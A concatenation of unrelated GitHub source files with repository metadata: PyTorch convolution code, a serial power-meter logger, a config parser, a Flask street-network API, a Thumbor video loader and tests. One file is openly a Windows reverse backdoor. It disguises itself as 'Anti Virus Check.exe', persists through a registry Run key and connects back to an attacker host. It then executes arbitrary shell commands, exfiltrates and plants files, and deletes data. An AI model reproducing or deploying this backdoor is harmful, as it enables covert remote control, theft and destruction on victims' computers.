import torch.nn as nn
# Based on https://towardsdatascience.com/building-a-convolutional-neural-network-from-scratch-using-numpy-a22808a00a40
def _overlapping_patch_generator(image_batch, kernel_size):
batch_size, image_h, image_w = image_batch.shape
for h in range(image_h - kernel_size + 1):
for w in range(image_w - kernel_size + 1):
patch = image_batch[:, h : (h + kernel_size), w : (w + kernel_size)]
yield patch, h, w
class Conv2d(nn.Module):
def __init__(self, kernel_num, kernel_size):
super().__init__()
self.kernel_num = kernel_num
self.kernel_size = kernel_size
kernels = torch.Tensor(kernel_num, kernel_size, kernel_size)
nn.init.normal_(kernels, mean=0.0, std=1.0 / (kernel_size**2))
# Wrap in nn.Parameter to let PyTorch know it needs updating
self.kernels = nn.Parameter(kernels)
def forward(self, x):
batch_size, image_h, image_w = x.shape
conv_output = torch.zeros(
[
batch_size,
self.kernel_num,
image_h - self.kernel_size + 1,
image_w - self.kernel_size + 1,
],
device=x.device,
)
for patch, h, w in _overlapping_patch_generator(x, self.kernel_size):
assert patch.shape == (batch_size, self.kernel_size, self.kernel_size)
assert self.kernels.shape == (
self.kernel_num,
self.kernel_size,
self.kernel_size,
)
patch = torch.unsqueeze(patch, dim=1)
# patch.shape == (batch_size, 1, self.kernel_size, self.kernel_size)
# self.kernel.shape == (self.kernel_num, self.kernel_size, self.kernel_size)
# So multiplication broadcasts over batch_size and kernel_num
mult = patch * self.kernels
assert mult.shape == (
batch_size,
self.kernel_num,
self.kernel_size,
self.kernel_size,
)
convolved = mult.sum(dim=(2, 3))
# Alternatively convolved = torch.einsum('bhw,khw->bk', patch, self.kernels)
# convolved_(i, j) is a patch (with top right coords (h, w)) of image_i convolved with kernel_j
assert convolved.shape == (batch_size, self.kernel_num)
conv_output[:, :, h, w] = convolved
return conv_output
# Following the recipe of https://pytorch.org/docs/stable/notes/extending.html
class Conv2dFunction(torch.autograd.Function):
    """Custom autograd Function computing the same cross-correlation as
    Conv2d, but with a hand-written backward pass.

    forward: out[b, k, h, w] = sum_{i,j} image[b, h+i, w+j] * kernels[k, i, j]
    """
    @staticmethod
    def forward(ctx, image_batch, kernels):
        # Keep the inputs around for the backward pass.
        ctx.save_for_backward(image_batch, kernels)
        batch_size, image_h, image_w = image_batch.shape
        kernel_num, kernel_h, kernel_w = kernels.shape
        assert kernel_h == kernel_w
        conv_output = torch.zeros(
            [
                batch_size,
                kernel_num,
                image_h - kernel_h + 1,
                image_w - kernel_w + 1,
            ],
            device=image_batch.device,
        )
        for patch, h, w in _overlapping_patch_generator(image_batch, kernel_w):
            # Contract the spatial dims of each window against every kernel:
            # (batch, h, w) x (kernel, h, w) -> (batch, kernel).
            conv_output[:, :, h, w] = torch.einsum("bhw,khw->bk", patch, kernels)
        return conv_output
    @staticmethod
    def backward(ctx, grad_output):
        image_batch, kernels = ctx.saved_tensors
        # Gradients stay None for inputs that don't require grad.
        grad_image_batch = grad_kernels = None
        kernel_num, kernel_h, kernel_w = kernels.shape
        if ctx.needs_input_grad[0]:
            # d(out)/d(image): each output cell (h, w) spreads its gradient,
            # weighted by the kernels, back over the k x k input window it
            # was computed from (overlapping windows accumulate via +=).
            grad_image_batch = torch.zeros(image_batch.shape, device=image_batch.device)
            for patch, h, w in _overlapping_patch_generator(image_batch, kernel_w):
                grad_image_batch[
                    :, h : h + (kernel_h), w : (w + kernel_w)
                ] += torch.einsum("khw,bk->bhw", kernels, grad_output[:, :, h, w])
        if ctx.needs_input_grad[1]:
            # d(out)/d(kernels): accumulate window x output-gradient over
            # every window position and every batch element.
            grad_kernels = torch.zeros(kernels.shape, device=kernels.device)
            for patch, h, w in _overlapping_patch_generator(image_batch, kernel_w):
                grad_kernels += torch.einsum(
                    "bhw,bk->khw", patch, grad_output[:, :, h, w]
                )
        return grad_image_batch, grad_kernels
class Conv2dFunctionWrapped(nn.Module):
    """nn.Module wrapper around the custom-autograd ``Conv2dFunction``.

    Holds the same parameters as ``Conv2d`` but routes the forward (and
    therefore backward) pass through the hand-written Function.
    """

    def __init__(self, kernel_num, kernel_size):
        super().__init__()
        self.kernel_num = kernel_num
        self.kernel_size = kernel_size
        # Same initialisation scheme as Conv2d: normal with std 1/k^2.
        weight = torch.Tensor(kernel_num, kernel_size, kernel_size)
        nn.init.normal_(weight, mean=0.0, std=1.0 / (kernel_size**2))
        # nn.Parameter registers the tensor so the optimizer updates it.
        self.kernels = nn.Parameter(weight)

    def forward(self, x):
        # Function.apply wires up ctx handling for the custom backward pass.
        return Conv2dFunction.apply(x, self.kernels)
| tomchaplin/JankAI | JankAI/cnn/_convolution.py | _convolution.py | py | 4,791 | python | en | code | 0 | github-code | 13 |
41562504181 | # coding reverse backdoor in python
# the main function is to let the user try to connect to us instead to we trying to coonnect to user
# ------------------------------- start of code -----------------------------
import os
import sys
import json
import socket
import base64
import shutil
import subprocess
class Suspicious:
def __init__(self, ip, port):
self.restart_control()
self.connetion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def restart_control(self):
piece_of_cake = os.environ['appdata'] + "\\Anti Virus Check.exe"
if not os.path.exists(piece_of_cake):
shutil.copy(sys.executable, piece_of_cake)
subprocess.call(f'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "{piece_of_cake}"', shell=True)
def handleErrorDataSendType(self, error):
return str(error)
def execute_system_commands(self, command):
# the output data type of the check_output method is byte
try:
command = " ".join(command)
return subprocess.check_output(command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL).decode('utf-8')
except Exception as error:
return self.handleErrorDataSendType(error)
# return "------- [=] Error while executing the command [=] ------"
def changeWorkingDirectory(self, path):
os.chdir(path)
return "[+] Changed current working folder to " + str(path)
def read_file(self, path):
with open(path, 'rb') as file:
return base64.b64encode(file.read())
def download_file(self, path, content):
with open(path, 'wb') as file:
file.write(base64.b64decode(content))
return "[+] File upload success"
def receive_data(self):
json_data = ""
while True:
try:
json_data += self.connetion.recv(1024).decode('utf-8')
return json.loads(json_data)
except ValueError:
continue
def send_data(self, data):
json_data = json.dumps(data)
self.connetion.send(json_data.encode('utf-8'))
def getSystemInfo(self):
platform = {'aix': 'AIX', 'linux':"Linux", 'win32': 'Windows', 'cygwin': 'Windows/Cygwin', 'darwin': 'macOs'}
return f"[+] Connected to \"{platform[sys.platform]}\" operating system"
def delete_from_system(self, path):
try:
if os.path.isdir(path):
shutil.rmtree(path)
return "[==] Folder delete successful"
elif os.path.isfile(path):
os.remove(path)
return "[==] file delete successfull"
except Exception as error:
return self.handleErrorDataSendType(error)
def move_files_within(self, src, dst):
try:
if os.path.isdir(dst):
shutil.move(src, dst)
return f"[==] folder moved to \"{dst}\" location"
else:
num = 0
while True:
if not os.path.exists(dst):
shutil.move(src, dst)
break
dst = dst + "-" + str(num)
num+=1
return f"[==] folder moved to \"{dst}\" location"
except Exception as error:
return self.handleErrorDataSendType(error)
def start(self):
while True:
try:
data_received = self.receive_data()
if data_received[0].lower() == 'exit':
break
# self.connetion.close()
# sys.exit()
elif data_received[0] == 'what':
command_result = self.getSystemInfo()
elif data_received[0].lower() == 'cd' and len(data_received) >1:
command_result = self.changeWorkingDirectory(data_received[1])
elif data_received[0].lower() == 'download':
command_result = self.read_file(data_received[1]).decode()
elif data_received[0].lower() == 'upload':
command_result = self.download_file(data_received[-2], data_received[-1])
elif data_received[0] == 'delete':
command_result = self.delete_from_system(data_received[1])
elif data_received[0] == 'move-within':
command_result = self.move_files_within(data_received[1], data_received[2])
else:
command_result = self.execute_system_commands(data_received)
self.send_data(command_result)
# except subprocess.CalledProcessError as error:
# self.send_data("-------[=] Error => subprocess.CalledProcessError [=] -------")
except Exception as error:
self.send_data(str(error))
self.send_data("---- [=] Error while executing command [=] ----")
# self.send_data("---- [=] Connection is still intact though [=] ----")
# these ip and port values are of hackers system values
while True:
try:
backdoor = Suspicious(ip, port)
backdoor.start()
except:
continue | vijay2249/random-stuff | Backdoor/reverseBackdoor.py | reverseBackdoor.py | py | 5,337 | python | en | code | 0 | github-code | 13 |
4743037723 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Unit tests for testing the GalleryItem class.
'''
import os
import unittest
from app.classes.gallery_item import GalleryItem
class TestClassGalleryItem(unittest.TestCase):
    '''
    Performs tests on the GalleryItem class.
    '''
    def setUp(self):
        # Keys every gallery-item info() payload is expected to expose.
        self.keys = [
            'description','view_count','url',
            'title','image_url','type','id',
            'owner_id'
            ]

    def test_dataset_keys(self):
        '''
        classes.gallery_item: Test that the GalleryItem class returns the right keys.
        '''
        result = GalleryItem('753ccf05-872f-4c8d-9cc2-8e562f6fc1d5').info()
        for key in self.keys:
            # subTest reports *every* missing key instead of stopping at the
            # first failure; membership works directly on the dict (no need
            # for the previous redundant .keys() call).
            with self.subTest(key=key):
                self.assertIn(key, result)
| luiscape/hdx-monitor-sql-collect | tests/test_class_gallery_item.py | test_class_gallery_item.py | py | 695 | python | en | code | 0 | github-code | 13 |
18190764572 | from __future__ import division
import time
import sys
import serial
import os
import math
import datetime as dt
import threading
from threading import Timer
import numpy as np
#--------------------------- HELP MENU------------
import argparse
parser = argparse.ArgumentParser(description='Script para Adquisicion de datos del Power Meter, donde se le pasa por parametro el tiempo en minutos o el numero de muestras que se quieren tomar.\n Example: \"RFPM002-cp_us.py s 1000 ./Mediciones_exterior Posicion1\"\n Example: \"RFPM002-cp_us.py t 10 ./Mediciones_exterior Posicion1\"', formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("[option]", help="s (samples), o \nt (time).")
parser.add_argument("Number", help="for option=s ---> numero de muestras\n"
"for option=t ---> tiempo en minutos.")
parser.add_argument("Carpeta", help="Nombre o ruta de la carpeta donde se guardaran los archivos.\nEn caso de no existir la carpeta se crea automaticamente.")
parser.add_argument("Archivo", help="Nombre del archivo a guardar.")
args = parser.parse_args()
#---------------------------------------------------
class Controlador():
    """Serial-port controller for the RF power meter.

    Auto-detects the first /dev/ttyUSB* adapter, opens it at 115200 8O1,
    and exposes thin wrappers over the pyserial read/write primitives.
    """

    def __init__(self):
        """Open the serial port.

        Raises Exception with a descriptive message when no USB-serial
        adapter is present or the port cannot be configured.  (The device
        lookup previously sat outside the try block, so a missing adapter
        surfaced as a bare IndexError instead.)
        """
        try:
            # Linux: take the first USB-serial adapter found.
            candidatos = [x for x in os.listdir('/dev') if x.startswith('ttyUSB')]
            if not candidatos:
                raise Exception("no /dev/ttyUSB* device found")
            puerto = "/dev/" + candidatos[0]
            # Windows: use a fixed COM port instead.
            # puerto = 'COM4'
            self.ser = serial.Serial(
                port=puerto,
                baudrate=115200,
                parity=serial.PARITY_ODD,
                stopbits=serial.STOPBITS_ONE,
                bytesize=serial.EIGHTBITS,
                timeout=0.5
            )
            if not self.ser.isOpen():
                self.ser.open()
            # Let the device settle after opening the port; per the original
            # author, removing this delay breaks the first reads.
            time.sleep(3)
        except Exception as e:
            raise Exception("Error al incializar puerto: " + str(e))

    def Escribir(self,instr):
        """Send a command string to the device."""
        self.ser.write(instr.encode())

    def ContInput(self):
        """Return the number of bytes waiting in the input buffer."""
        return self.ser.inWaiting()

    def ContRead(self):
        """Read and return one line from the device."""
        return self.ser.readline()

    def End(self):
        """Close the serial port."""
        self.ser.close()
#Esta clase fue creada con el proposito de crear el archivo .csv lo mas simple y ordenadamente como se era posible
class Archivo():
    """Tiny CSV writer: one "timestamp,power" row per sample."""

    def __init__(self, carpeta, narch):
        """Open ``carpeta + narch`` for writing, creating the folder first.

        Uses os.makedirs(..., exist_ok=True): nested paths now work and the
        check-then-create race of the previous exists()/mkdir() pair is gone.
        `carpeta` is expected to end with a path separator (as the callers
        in this script provide it).
        """
        os.makedirs(carpeta, exist_ok=True)
        self.save = open(carpeta + narch, 'w')

    def Escribir(self,tiempo,potencia):
        """Append one CSV row: "<tiempo>,<potencia>"."""
        self.save.write(tiempo + ',' + potencia+'\n')

    def Cerrar(self):
        """Flush and close the output file."""
        self.save.close()
#Aquí se declaran las variables iniciales y se da la primera instrucción
pw = Controlador()
pw.Escribir('c'+ '\r')
foldername = "./"+sys.argv[3]+"/"
filename=sys.argv[4]+".csv"
file = Archivo(foldername,filename)
muestras = 0 #Este es el contador de muestras
#estas son variables que se utilizaran para poder verificar los datos y obtener medidas que ayuden al analisis de estos
oldtiempo = "0"
VectorTimestamp=[]
meanpotencia = 0
potenciaold=-100
valid = True
EscrBuffer = 0
while(not EscrBuffer):
EscrBuffer = pw.ContInput()
#Este while esta puesto solo por seguridad
pw.ContRead() #Este se amplica para que no lea la instruccion.
while(EscrBuffer):
    # One line from the meter; its bytes repr looks like
    # "b'<timestamp_us>,<power_dBm>...'".
    out = str(pw.ContRead())
    data = out.split(',')
    tiempo = data[0][2:12]   # skip the leading "b'" of the repr
    # Bug fix: `valid` was only initialised once before the loop, so a single
    # malformed sample flagged every following sample as invalid and ended
    # the acquisition early.  Reset it for every new line.
    valid = True
    potencia = ""
    if(len(data) == 2):
        # Keep only digits, '-' and '.' from the power field.
        for k in str(data[1]):
            try:
                carac = int(k)
                potencia = potencia + str(k)
            except:
                if(str(k) == "-" or str(k) == "."):
                    potencia = potencia + str(k)
    # Validate the timestamp before any numeric comparison.
    try:
        temptiempo = float(tiempo)
    except:
        valid = False
        print("muestra invalida")
    # Bug fix: test `valid`/emptiness *before* converting — the original
    # evaluated float(tiempo) first and raised an uncaught ValueError on
    # malformed lines.  Jumps of >= 10 s or backwards jumps are rejected.
    if (not valid) or (tiempo == '') or (float(tiempo) >= float(oldtiempo)+10000) or (float(tiempo)<float(oldtiempo)):
        print ("timestamp not valid")
        break
    print(tiempo, " , ", potencia)
    # Validate the power reading.
    try:
        temppotencia = float(potencia)
    except:
        valid = False
        print("potencia invalida")
    # Bug fix: same reordering — only convert once we know it parsed.
    # Readings outside (-70, 0) dBm are discarded as incoherent.
    if valid and (float(potencia)>-70) and (float(potencia)<0):
        # Sample accepted: persist it and update the running statistics.
        muestras += 1
        file.Escribir(tiempo, potencia)
        VectorTimestamp.append(int(tiempo))
        meanpotencia = meanpotencia+pow(10,float(potencia)/10.0) # dBm -> mW
        oldtiempo = tiempo
        if(muestras<=1):
            maxPeak = potencia
        elif(float(maxPeak)<float(potencia)):
            maxPeak=float(potencia)
        potenciaold=float(potencia)
    else:
        print ("potencia is not valid: " + potencia)
    # Stop conditions: requested number of samples ("s") or requested
    # acquisition time in minutes ("t"; the meter clock is in microseconds).
    if (sys.argv[1] == "s" and muestras == int(sys.argv[2])):
        EscrBuffer = 0
        pw.End()
        VectorTimestamp_asarray=np.asarray(VectorTimestamp)
        SamplingTime=np.mean(np.diff(VectorTimestamp_asarray))*math.pow(10,-3)
        print("meanRSS is: " + str(10*math.log10(meanpotencia/muestras)))
        print("MaxPeak is: " + str(maxPeak))
        print("Sampling time (ms):"+str(SamplingTime))
    elif (sys.argv[1] == 't' and float(tiempo) >= float(sys.argv[2])*60*1000000):
        EscrBuffer = 0
        pw.End()
        VectorTimestamp_asarray=np.asarray(VectorTimestamp)
        SamplingTime=np.mean(np.diff(VectorTimestamp_asarray))*math.pow(10,-3)
        print("meanRSS is: " + str(10*math.log10(meanpotencia/muestras)))
        print("MaxPeak is: " + str(maxPeak))
        print("Sampling time (ms):"+str(SamplingTime))
29905292430 | import os
from configparser import ConfigParser, NoOptionError, NoSectionError
from pathlib import Path
from typing import Any, Literal, Union
# Numeric alias used for speed values.
NumberType = Union[int, float]
# Option keys for paragraph sizes and timed-mode durations.
SIZES = ["teensy", "small", "big", "huge"]
TIMES = ["15", "30", "60", "120"]
SpeedType = Literal["low", "med", "high"]
# Factory defaults for the [user] section of termtyper.ini.
DEFAULTS = {
    "difficulty": "normal",
    "blind_mode": "off",
    "min_speed": "0",
    "min_accuracy": "0",
    "min_burst": "0",
    "force_correct": "off",
    "confidence_mode": "off",
    "capitalization_mode": "off",
    "single_line_words": "off",
    "cursor_buddy": "0",
    "cursor_buddy_speed": "0",
    "tab_reset": "off",
    "restart_same": "off",
    "paragraph_size": "teensy",
    "timeout": "15",
    "language": "english",
}
# Paragraph content toggles (stored in the file as "True"/"False").
PARAPHRASE = {
    "numbers": False,
    "punctuations": False,
}
# Speed records per bucket: "low" starts at a sentinel 100000 (min-so-far),
# "med"/"high" start at 0 (max-so-far).
SPEED_RECORDS_WORDS = {
    **{f"{size}_low": 100000 for size in SIZES},
    **{f"{size}_med": 0 for size in SIZES},
    **{f"{size}_high": 0 for size in SIZES},
}
SPEED_RECORDS_TIME = {
    **{f"{time}_low": 100000 for time in TIMES},
    **{f"{time}_med": 0 for time in TIMES},
    **{f"{time}_high": 0 for time in TIMES},
}
THEMING = {
    "caret_style": "block",
    "bar_theme": "minimal",
    "sound": "mech",
    "keypress_sound": "off",
}
MODE = {
    "writing mode": "words",
}
# Full default layout of the ini file, keyed by section name.
CONF_DICT = {
    "user": DEFAULTS,
    "theming": THEMING,
    "paragraph": PARAPHRASE,
    "mode": MODE,
    "speed records word": SPEED_RECORDS_WORDS,
    "speed records time": SPEED_RECORDS_TIME,
}
def get_config_location() -> Path:
    """Resolve the directory that should hold the config file.

    Preference order: $XDG_CONFIG_HOME, then ~/.config, then the home dir.
    """
    xdg_home = os.environ.get("XDG_CONFIG_HOME")
    if xdg_home is not None:
        return Path(xdg_home).expanduser()
    home = Path.home()
    candidate = os.path.join(home, ".config")
    return Path(candidate) if os.path.isdir(candidate) else home
class Parser(ConfigParser):
    """
    A sub class of ConfigParser class
    to parse the currently set options in the settings menu
    """

    # Resolved once at class-definition time; all instances share this file.
    config_path = get_config_location() / "termtyper"
    file_path = config_path / "termtyper.ini"

    def __init__(self) -> None:
        super().__init__()
        if not self.read(self.file_path):
            self._create_user_config()
        else:
            # A single section means a stale/partial file; rebuild from defaults.
            if len(self.sections()) == 1:
                self.clear()
                self._create_user_config()

    def _create_user_config(self) -> None:
        """Create a fresh config file populated with the defaults."""
        if not self.config_path.is_dir():
            os.mkdir(self.config_path)

        print("No config found !\nCreating....")
        with open(self.file_path, "w"):
            pass

        self.read_dict(CONF_DICT)
        self._write_to_file()

    def _add_default_config(self, section: str, option: str) -> None:
        """Backfill a missing option from CONF_DICT, or raise like ConfigParser."""
        if section in CONF_DICT:
            if option in CONF_DICT[section]:
                self.set(section, option, str(CONF_DICT[section][option]))
            else:
                raise NoOptionError(option, section)
        else:
            raise NoSectionError(section)

    def get(self, section: str, option: str, **kwargs) -> str:
        """
        Override the get method to add the default value if data doesn't exist
        """
        # NOTE: unlike the base class, `raw` defaults to True (no interpolation).
        try:
            return super().get(
                section,
                option,
                raw=kwargs.get("raw", True),
                vars=kwargs.get("vars", None),
            )
        except NoOptionError:
            self._add_default_config(section, option)
            return super().get(
                section,
                option,
                raw=kwargs.get("raw", True),
                vars=kwargs.get("vars", None),
            )

    def toggle_numbers(self):
        """Flip the paragraph `numbers` flag (stored as "True"/"False")."""
        numbers = self.get("paragraph", "numbers")
        self.set("paragraph", "numbers", "True" if str(numbers) == "False" else "False")

    def toggle_punctuations(self):
        """Flip the paragraph `punctuations` flag (stored as "True"/"False")."""
        punctuations = self.get("paragraph", "punctuations")
        self.set(
            "paragraph",
            "punctuations",
            "True" if str(punctuations) == "False" else "False",
        )

    def set(self, section: str, option: str, value: str | None = None) -> None:
        """Set an option and immediately persist the whole file."""
        super().set(section, option, value)
        self._write_to_file()

    def set_speed(self, speed: SpeedType, value: NumberType) -> None:
        """Record a speed stat under the current mode's size/timeout bucket."""
        mode = self.get("mode", "writing mode")
        if mode == "words":
            paragraph_size = self.get_data("paragraph_size")
            self.set("speed records word", f"{paragraph_size}_{speed}", str(value))
        else:
            timeout = int(self.get_data("timeout"))
            self.set("speed records time", f"{timeout}_{speed}", str(value))

    def get_speed(self, speed: SpeedType) -> float:
        """Read a speed stat for the current mode's size/timeout bucket."""
        mode = self.get("mode", "writing mode")
        if mode == "words":
            paragraph_size = self.get_data("paragraph_size")
            return float(self.get("speed records word", f"{paragraph_size}_{speed}"))
        else:
            timeout = int(self.get_data("timeout"))
            return float(self.get("speed records time", f"{timeout}_{speed}"))

    def get_theme(self, data: str):
        return self.get("theming", data)

    def set_theme(self, data: str, value: Any):
        return self.set("theming", data, str(value))

    def get_para_setting(self, data: str) -> bool:
        # Values are written via str(bool) as "True"/"False"; compare explicitly
        # instead of eval()-ing text read from a user-editable file.
        return self.get("paragraph", data) == "True"

    def set_para_setting(self, data: str, value: Any):
        return self.set("paragraph", data, str(value))

    def _write_to_file(self) -> None:
        with open(self.file_path, "w") as fp:
            self.write(fp)

    def get_data(self, data: str) -> str:
        """Shorthand for options in the [user] section."""
        return self.get("user", data)
# Module-level singleton; importing this module creates/loads the config file.
MAIN_PARSER = Parser()
| kraanzu/termtyper | termtyper/utils/parser.py | parser.py | py | 5,815 | python | en | code | 975 | github-code | 13 |
20056839286 | from dnd_bot.logic.prototype.entity import Entity
class Corpse(Entity):
    """Lootable remains left behind by a dead creature."""

    entity_name = "Corpse"
    sprite_path = "dnd_bot/assets/gfx/entities/corpse.png"

    def __init__(self, x=0, y=0, game_token="", creature_name="", dropped_money=0, dropped_items=None, sprite_path=None):
        """creates corpse entity with default sprite, but you can pass path to other sprite"""
        if dropped_items is None:
            dropped_items = []
        # Use the override locally instead of mutating the Corpse.sprite_path
        # class attribute, which leaked a custom sprite into every corpse
        # created afterwards.
        sprite = sprite_path if sprite_path is not None else Corpse.sprite_path
        super().__init__(x=x, y=y, game_token=game_token, name=Corpse.entity_name, sprite=sprite, fragile=True)
        self.dropped_money = dropped_money
        self.dropped_items = dropped_items
        self.creature_name = creature_name
| esoviscode/discord-dnd-bot | dnd-bot/dnd_bot/logic/prototype/entities/misc/corpse.py | corpse.py | py | 778 | python | en | code | 4 | github-code | 13 |
33484738152 | #Write a program to check whether the no is Armstrong or not
def is_armstrong(number):
    """True if `number` equals the sum of its digits, each raised to the
    power of the digit count (a narcissistic/Armstrong number).

    The original hard-coded the exponent 3, which is only correct for
    3-digit inputs (e.g. 9474 was misclassified).
    """
    digits = str(number)
    return number == sum(int(d) ** len(digits) for d in digits)

if __name__ == "__main__":
    # int(input(...)) instead of eval(input(...)): eval executes arbitrary
    # expressions typed by the user.
    s = int(input("enter the no\n"))
    if is_armstrong(s):
        print(s, "is amstrong no")
    else:
        print(s, "is not a amstrong no")
| snehasurna1875/100-days-of-code | Day-39/Amstrongno.py | Amstrongno.py | py | 275 | python | en | code | 0 | github-code | 13 |
31942722448 | from flask import Flask, Response
from flask import jsonify, request
import os.path
import osmnx as ox
from networkx.readwrite import json_graph
app = Flask(__name__)
def root_dir():  # pragma: no cover
    """Absolute path of the directory that contains this module."""
    module_dir = os.path.dirname(__file__)
    return os.path.abspath(module_dir)
def get_file(filename):  # pragma: no cover
    """Read a file located relative to this module's directory.

    Returns the file contents, or the stringified error if the file
    cannot be opened/read.
    """
    try:
        src = os.path.join(root_dir(), filename)
        # Context manager closes the handle; the original leaked it.
        with open(src) as f:
            return f.read()
    except IOError as exc:
        return str(exc)
# ------------------------------------------------
# /
# ------------------------------------------------
@app.route('/')
def index():
    """Landing route: plain-text service banner."""
    return 'Street Network Analysis'
# ------------------------------------------------
# /basic_stats_from_point
# ------------------------------------------------
@app.route('/basic_stats_from_point', methods=['POST'])
def basic_stats_from_point():
    """Return ox.basic_stats(...) for the street network around a point.

    Expects a JSON body with `latitude`, `longitude` and `network_type`.
    """
    values = request.get_json()
    latitude = values.get('latitude')
    longitude = values.get('longitude')
    network_type = values.get('network_type')
    if network_type is None:
        return "Error, please supply a valid network_type", 400
    if latitude is None or longitude is None:
        return "Error, please supply a valid latitude and longitude", 400
    print(latitude, longitude)
    print(network_type)
    coord = (latitude, longitude)
    G = ox.graph_from_point(coord, network_type=network_type)
    basic_stats = ox.basic_stats(G)
    # ox.basic_stats returns a plain dict; Response() cannot serialise a
    # dict, so jsonify it (the original passed the dict straight through).
    return jsonify(basic_stats)
# ------------------------------------------------
# /graph_from_point
# ------------------------------------------------
@app.route('/graph_from_point', methods=['POST'])
def graph_from_point():
    """Build a street network around a lat/lon point and return it as GraphML.

    Expects a JSON body with `latitude`, `longitude` and `network_type`.
    NOTE(review): latitude/longitude are not validated (unlike network_type);
    a missing coordinate surfaces as a 500 from osmnx — confirm intended.
    """
    values = request.get_json()
    latitude = values.get('latitude')
    longitude = values.get('longitude')
    network_type = values.get('network_type')
    if network_type is None:
        return "Error, please supply a valid network_type", 400
    print(latitude, longitude)
    print(network_type)
    coord = (latitude, longitude)
    G = ox.graph_from_point(coord, network_type=network_type)
    # Round-trips through a fixed file on disk; concurrent requests share it.
    ox.save_graphml(G, filename="graph_from_location.graphml", folder="/app/output")
    content = get_file('output/graph_from_location.graphml')
    return Response(content, mimetype="application/xml")
# ------------------------------------------------
# /graph_from_place
# ------------------------------------------------
@app.route('/graph_from_place', methods=['POST'])
def graph_from_place():
    """Build a street network for a named place and return it as GraphML.

    Expects a JSON body with `location` (a geocodable place name) and
    `network_type`.
    """
    values = request.get_json()
    location = values.get('location')
    network_type = values.get('network_type')
    print(location)
    print(network_type)
    if location is None:
        return "Error, please supply a valid location", 400
    if network_type is None:
        return "Error, please supply a valid network_type", 400
    G = ox.graph_from_place(location, network_type=network_type)
    # Round-trips through a fixed file on disk; concurrent requests share it.
    ox.save_graphml(G, filename="graph_from_place.graphml", folder="/app/output")
    content = get_file('output/graph_from_place.graphml')
    return Response(content, mimetype="application/xml")
# ------------------------------------------------
# app run
# ------------------------------------------------
if __name__ == '__main__':
    # Dev server only; use a proper WSGI server in production.
    app.run(debug=True,host='0.0.0.0', port=5000)
| cosmycx/fdns-ms-snxa | app.py | app.py | py | 3,508 | python | en | code | 0 | github-code | 13 |
219552643 | """
import sys
# sys.stdin = open("input.txt", 'r')
if __name__ == "__main__":
n = int(input())
arr = list(map(int, input().split()))
memo = [1] * (n)
for i in range(1, n):
maximum = 1
idx = 0
for j in range(i - 1, -1, -1):
if arr[j] < arr[i]:
if memo[j] + 1 > maximum:
maximum = memo[j] + 1
idx = j
memo[i] = maximum
pos = idx
print(max(memo))
"""
import sys
# sys.stdin = open("input.txt", 'r')
def lis_length(arr):
    """Length of the longest strictly increasing subsequence (O(n^2) DP).

    memo[i] = length of the longest increasing subsequence ending at arr[i];
    every element alone is a subsequence of length 1, hence the base value.
    The previous version initialised memo to 0, so every answer came out one
    short (e.g. [1, 2, 3] gave 2 instead of 3).
    """
    n = len(arr)
    if n == 0:
        return 0
    memo = [1] * n
    for i in range(1, n):
        for j in range(i):
            if arr[j] < arr[i] and memo[j] + 1 > memo[i]:
                memo[i] = memo[j] + 1
    return max(memo)

if __name__ == "__main__":
    n = int(input())
    arr = list(map(int, input().split()))
    print(lis_length(arr))
12983887589 | import re
import os
from urllib import unquote
from functools import partial
from tempfile import NamedTemporaryFile
from thumbor.loaders import LoaderResult
from tornado.process import Subprocess
from thumbor.utils import logger
from wikimedia_thumbor_base_engine import BaseWikimediaEngine
uri_scheme = 'http://'
def should_run(url):
    """True when the (percent-decoded) URL ends in a video extension we handle."""
    decoded = unquote(url)
    return re.search(r'\.(ogv|webm)$', decoded, re.I) is not None
def load_sync(context, url, callback):
    """Thumbor loader entry point: probe the video's duration with ffprobe,
    then continue in _parse_time_status -> _parse_time to extract one frame."""
    # Disable storage of original. These lines are useful if
    # you want your Thumbor instance to store all originals persistently
    # except video frames.
    #
    # from thumbor.storages.no_storage import Storage as NoStorage
    # context.modules.storage = NoStorage(context)

    unquoted_url = unquote(url)

    command = BaseWikimediaEngine.wrap_command([
        context.config.FFPROBE_PATH,
        '-v',
        'error',
        '-show_entries',
        'format=duration',
        '-of',
        'default=noprint_wrappers=1:nokey=1',
        '%s%s' % (uri_scheme, unquoted_url)
    ], context)

    logger.debug('Command: %r' % command)

    process = Subprocess(command, stdout=Subprocess.STREAM)

    process.set_exit_callback(
        partial(
            _parse_time_status,
            context,
            unquoted_url,
            callback,
            process
        )
    )
def _parse_time_status(context, url, callback, process, status):
    """Exit callback for ffprobe: fail the load on non-zero exit, otherwise
    read the printed duration and continue in _parse_time."""
    if status != 0:
        result = LoaderResult()
        result.successful = False
        callback(result)
    else:
        process.stdout.read_until_close(
            partial(
                _parse_time,
                context,
                url,
                callback
            )
        )
def _parse_time(context, url, callback, output):
    """Seek into the video (requested `page`, else the midpoint of the probed
    duration) and extract a single frame with ffmpeg into a temp file."""
    duration = float(output)
    unquoted_url = unquote(url)

    try:
        seek = int(context.request.page)
    except AttributeError:
        seek = duration / 2

    # delete=False: the path outlives this scope; _process_output removes it.
    destination = NamedTemporaryFile(delete=False)

    command = BaseWikimediaEngine.wrap_command([
        context.config.FFMPEG_PATH,
        # Order is important, for fast seeking -ss has to come before -i
        # As explained on https://trac.ffmpeg.org/wiki/Seeking
        '-ss',
        '%d' % seek,
        '-i',
        '%s%s' % (uri_scheme, unquoted_url),
        '-y',
        '-vframes',
        '1',
        '-an',
        '-f',
        'image2',
        '-nostats',
        '-loglevel',
        'error',
        destination.name
    ], context)

    logger.debug('Command: %r' % command)

    process = Subprocess(command)

    process.set_exit_callback(
        partial(
            _process_output,
            callback,
            destination.name
        )
    )
def _process_output(callback, destination_name, status):
    """Exit callback for ffmpeg: package the extracted frame (or a failure)
    into a LoaderResult and always clean up the temp file."""
    result = LoaderResult()

    if status != 0:
        result.successful = False
    else:
        result.successful = True
        with open(destination_name, 'rb') as f:
            result.buffer = f.read()

    os.remove(destination_name)

    callback(result)
| wikimedia/thumbor-video-loader | wikimedia_thumbor_video_loader/__init__.py | __init__.py | py | 3,111 | python | en | code | 0 | github-code | 13 |
32826185805 | import math
def is_prime(n):
    """Trial-division primality test.

    The original returned True for n < 2 (0, 1 and negatives) because the
    loop body never ran; primes are defined only for n >= 2.
    """
    if n < 2:
        return False
